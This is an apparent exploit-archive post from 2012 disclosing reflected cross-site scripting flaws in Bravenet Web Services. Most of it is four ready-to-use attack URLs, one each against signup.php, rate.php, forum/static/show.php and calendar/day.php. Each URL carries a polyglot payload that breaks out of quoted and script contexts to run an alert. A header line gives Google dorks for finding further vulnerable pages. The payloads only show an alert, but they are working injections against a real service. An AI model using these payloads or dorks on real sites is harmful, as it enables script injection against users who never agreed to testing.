Bravenet Web Services suffers from a cross site scripting vulnerability.
13e0082063b74510016efa214322429d1ea204a41d51404d33e56e83e8b7b8b1
# Exploit Title: Bravenet Web Services Cross Site Scripting
# Date: 29.02.2012
# Author: Sony
# Software Link: bravenet.com/
# Google Dorks: inurl:calendar/day.php?usernum= or inurl:
http://pub22.bravenet.com or what you want
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/bravenet-web-services-cross-site.html
..................................................................
What is Bravenet? Simple, but interesting services.
http://wiki.bravenet.com/Main_Page
We have a multiple cross site scripting vulnerabilities.
1. signup.php
http://www.bravenet.com/signup/signup.php?serv_name=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://3.bp.blogspot.com/-ES-Kj70ptiU/T05hWfEh2xI/AAAAAAAAApg/x9kV-px8MGs/s1600/1.JPG
2. rate.php
http://pub22.bravenet.com/freelink/rate.php?usernum=1852580888&id=892119%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://4.bp.blogspot.com/-0TAfk_kYXi4/T05hi6oU9YI/AAAAAAAAAps/pTyj6eZ_PRM/s1600/2rate.JPG
3. forum/static/show.php
http://pub22.bravenet.com/forum/static/show.php?usernum=1868266528&frmid=1811%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&msgid=0
http://1.bp.blogspot.com/-VfznVUkRrUw/T05h1KVkvDI/AAAAAAAAAp4/7edxJaRVaOU/s1600/3f.JPG
4. calendar/day.php
http://pub22.bravenet.com/calendar/day.php?usernum=1875234170%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&y=2012&m=02&d=08
http://3.bp.blogspot.com/-igQxXEEr7PM/T05iAItutcI/AAAAAAAAAqE/eASANv17wpM/s1600/4calendar.JPG
Etc..